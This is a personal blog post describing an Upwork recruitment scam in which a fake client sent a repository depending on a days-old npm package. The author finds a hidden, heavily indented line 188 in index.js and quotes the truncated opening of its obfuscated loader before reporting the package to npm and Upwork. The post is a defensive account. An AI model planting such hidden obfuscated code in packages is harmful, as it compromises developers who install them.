4 Nov 2025

Scam Attempt

I applied for a good project on Upwork - too good to be true in hindsight:

They were smart, pretending to be Japanese, so the English jobdescription wasn't written very good and very concise.

Picture 1

The interview was via chat, which made sense given their poor English skills

And then they asked to look at their website and they send me a repo to pull and install.

I don't know what triggered my suspicion...?

But when I saw the repo, I felt something is off

Picture 2

And when I asked Chatgpt to look at the package.json, and it came back with an unknown package, I was pretty sure I was being scammed.

pic3

I could have stopped there and then, but my curiosity was aroused.

It turned out this package was created 2 days ago, by someone with an email without any identifiers (duhabunevoy627).

Pic 4 pic 4b

I asked Cursor to create a safe Docker setup and had a look.

It contained an Index.js file, which looked clean, but which had a hidden line 188 with a lot of indentations, and started with some kind of encryption code:

global['!']='4';var _$_1e42=(function(l,e){var h=l.length;var g=[];for(var j=0;j< h;j++){g[j]= l.charAt( Pic 5a pic 5b

That was enough for me, it was exciting to understand what was happening, and I learned a lot.

I reported to NPM, I reported to Upwork.